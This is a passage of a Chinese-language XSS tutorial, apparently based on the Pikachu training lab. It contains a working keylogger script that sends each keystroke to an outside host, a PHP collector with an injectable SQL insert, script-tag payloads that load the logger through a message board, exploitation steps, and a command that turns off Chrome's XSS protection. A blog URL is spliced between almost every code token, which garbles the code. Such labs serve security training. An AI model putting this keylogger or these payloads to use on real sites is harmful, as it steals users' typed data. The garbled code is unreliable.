xl=https://blog.csdn.net/qq_45555226/article/details/"datax="https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/functionhttps://blog.csdn.net/qq_45555226/article/details/ onkeypresshttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ {https://blog.csdn.net/qq_45555226/article/details/    varhttps://blog.csdn.net/qq_45555226/article/details/ realkey =https://blog.csdn.net/qq_45555226/article/details/ String.https://blog.csdn.net/qq_45555226/article/details/fromCharCodehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/event.https://blog.csdn.net/qq_45555226/article/details/keyCode)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    xl+=https://blog.csdn.net/qq_45555226/article/details/realkey;https://blog.csdn.net/qq_45555226/article/details/    showhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/document.https://blog.csdn.net/qq_45555226/article/details/onkeypress =https://blog.csdn.net/qq_45555226/article/details/ onkeypress;https://blog.csdn.net/qq_45555226/article/details/functionhttps://blog.csdn.net/qq_45555226/article/details/ showhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ {https://blog.csdn.net/qq_45555226/article/details/    ajax =https://blog.csdn.net/qq_45555226/article/details/ createAjaxhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    ajax.https://blog.csdn.net/qq_45555226/article/details/onreadystatechangehttps://blog.csdn.net/qq_45555226/article/details/ =https://blog.csdn.net/qq_45555226/article/details/ functionhttps://blog.csdn.net/qq_45555226/article/details/ (https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ {https://blog.csdn.net/qq_45555226/article/details/        ifhttps://blog.csdn.net/qq_45555226/article/details/ (https://blog.csdn.net/qq_45555226/article/details/ajax.https://blog.csdn.net/qq_45555226/article/details/readyState ==https://blog.csdn.net/qq_45555226/article/details/ 4https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ {https://blog.csdn.net/qq_45555226/article/details/            ifhttps://blog.csdn.net/qq_45555226/article/details/ (https://blog.csdn.net/qq_45555226/article/details/ajax.https://blog.csdn.net/qq_45555226/article/details/status ==https://blog.csdn.net/qq_45555226/article/details/ 200https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ {https://blog.csdn.net/qq_45555226/article/details/                varhttps://blog.csdn.net/qq_45555226/article/details/ data =https://blog.csdn.net/qq_45555226/article/details/ ajax.https://blog.csdn.net/qq_45555226/article/details/responseText;https://blog.csdn.net/qq_45555226/article/details/            }https://blog.csdn.net/qq_45555226/article/details/ elsehttps://blog.csdn.net/qq_45555226/article/details/ {https://blog.csdn.net/qq_45555226/article/details/                alerthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"頁面請求失敗"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/            }https://blog.csdn.net/qq_45555226/article/details/        }https://blog.csdn.net/qq_45555226/article/details/    }https://blog.csdn.net/qq_45555226/article/details/    varhttps://blog.csdn.net/qq_45555226/article/details/ postdate =https://blog.csdn.net/qq_45555226/article/details/ xl;https://blog.csdn.net/qq_45555226/article/details/    ajax.https://blog.csdn.net/qq_45555226/article/details/openhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"POST"https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ "http://www.exploit.cool/exp/pikachu/pkxss/rkeypress/rkserver.php"https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/truehttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    ajax.https://blog.csdn.net/qq_45555226/article/details/setRequestHeaderhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"Content-type"https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ "application/x-www-form-urlencoded"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    ajax.https://blog.csdn.net/qq_45555226/article/details/setRequestHeaderhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"Content-length"https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ postdate.https://blog.csdn.net/qq_45555226/article/details/length)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    ajax.https://blog.csdn.net/qq_45555226/article/details/setRequestHeaderhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"Connection"https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ "close"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    ajax.https://blog.csdn.net/qq_45555226/article/details/sendhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/postdate)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/

(4)rkserver.php

<?phphttps://blog.csdn.net/qq_45555226/article/details//** * Created by runner.han * There is nothing new under the sun */https://blog.csdn.net/qq_45555226/article/details/include_oncehttps://blog.csdn.net/qq_45555226/article/details/ '../inc/config.inc.php'https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/include_oncehttps://blog.csdn.net/qq_45555226/article/details/ '../inc/mysql.inc.php'https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/connecthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details///設置允許被跨域訪問https://blog.csdn.net/qq_45555226/article/details/headerhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"Access-Control-Allow-Origin:*"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/$datahttps://blog.csdn.net/qq_45555226/article/details/ =https://blog.csdn.net/qq_45555226/article/details/ $_POSThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'datax'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/$queryhttps://blog.csdn.net/qq_45555226/article/details/ =https://blog.csdn.net/qq_45555226/article/details/ "insert keypress(data) values('$datahttps://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/')"https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/$resulthttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/mysqli_queryhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/$queryhttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/?https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/

(5)攻擊者的payload

payload-https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/1https://blog.csdn.net/qq_45555226/article/details/:可以<https://blog.csdn.net/qq_45555226/article/details/script src=https://blog.csdn.net/qq_45555226/article/details/"http://www.exploit.cool/exp/pikachu/pkxss/rkeypress/rk.js"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/script>https://blog.csdn.net/qq_45555226/article/details/payload-https://blog.csdn.net/qq_45555226/article/details/2https://blog.csdn.net/qq_45555226/article/details/:可以<https://blog.csdn.net/qq_45555226/article/details/script src=https://blog.csdn.net/qq_45555226/article/details/"//www.exploit.cool/exp/pikachu/pkxss/rkeypress/rk.js"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/script>https://blog.csdn.net/qq_45555226/article/details/payload-https://blog.csdn.net/qq_45555226/article/details/3https://blog.csdn.net/qq_45555226/article/details/:無效<https://blog.csdn.net/qq_45555226/article/details/img src=https://blog.csdn.net/qq_45555226/article/details/"http://www.exploit.cool/exp/pikachu/pkxss/rkeypress/rk.js"https://blog.csdn.net/qq_45555226/article/details/ /https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/ 

(6)利用過程:

第一步:模擬攻擊者把payload發佈到留言板,當受害則訪問該頁面的時候,觸發該xss漏洞。


第二步:模擬受害者訪問該留言板觸發xss漏洞,用戶的敲擊鍵盤的數據被記錄到攻擊者的遠程數據庫中。

第三步:模擬攻擊者通過自己的WEB服務器上的pkxss_keypress_result.php頁面讀取認證結果


或者攻擊者通過數據庫查看鍵盤數據

https://blog.csdn.net/qq_45555226/article/details/10、關閉瀏覽器XSS防護機制

(https://blog.csdn.net/qq_45555226/article/details/1)IE瀏覽器的關閉方法:

(2)chrome的關閉方法:

第一步:尋找Chrome的安裝目錄,如下所示

C:\Program Files (x86)\Google\Chrome\Application\Chrome.exe

第二步:打開cmd,輸入以下命令即可在關閉xss防護的時候打開瀏覽器,如下所示

"C:\Program Files (x86)\Google\Chrome\Application\Chrome.exe" --args --disable-xss-auditor

(3)firefox的關閉方法:

https://blog.csdn.net/qq_45555226/article/details/1https://blog.csdn.net/qq_45555226/article/details/1、思考

(https://blog.csdn.net/qq_45555226/article/details/1)彈窗測試的實質?

彈窗測試是為瞭測試script標簽是否可用可控!!!

(2)script標簽的作用?

第一點就是直接內嵌惡意的js腳本!!!第二點就是src外鏈惡意的js腳本!!!
本文來自網絡,不代表程式碼花園立場,如有侵權,請聯系管理員。https://www.codegarden.cn/article/5480/
返回顶部